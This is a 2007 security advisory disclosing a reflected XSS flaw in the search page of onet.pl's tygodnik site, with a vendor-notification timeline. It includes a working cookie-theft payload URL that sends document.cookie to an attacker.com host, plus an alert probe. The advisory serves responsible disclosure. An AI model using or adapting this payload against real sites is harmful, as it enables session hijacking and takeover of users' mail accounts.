kanedaaa... ... borys ... bohater ...
+ Subject:
XSS bug for www.onet.pl
+ Version:
2007.03.04
+ Discovered by:
Kanedaaa: http://kaneda.bohater.net
+ onet.pl Description:
Onet.pl is the most famous Polish web portal.
It is an interactive communication platform that runs millions e-mail accounts (poczta.onet.pl) system.
+ Description:
XSS IN:
http://tygodnik.onet.pl/fts.html?qt=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&szukaj.x=0&szukaj.y=0
http://tygodnik.onet.pl/fts.html?qt=%22%3E%3Cscript%3Elocation.href='http://attacker.com/xss.php?cook='%2Bescape(document.cookie)%3C%2Fscript%3E&szukaj.x=0&szukaj.y=0
That is a possibility to take over an user account from the mail service at http://poczta.onet.pl [and others in *.onet.pl domain] when the logged user would click at specially crafted URL.
Timeline:
2007.03.04 bug discovered
2007.03.04 bug sent via email from http://pomoc.onet.pl/index.html?KAT=1148
2007.03.07 response via email from Abuse Onet
2007.03.30 its fixed now (probably fixed earlier)
Original Advisory: http://kaneda.bohater.net/security/20070304-xss-onet.pl.php
Check my other bugs in security section: Security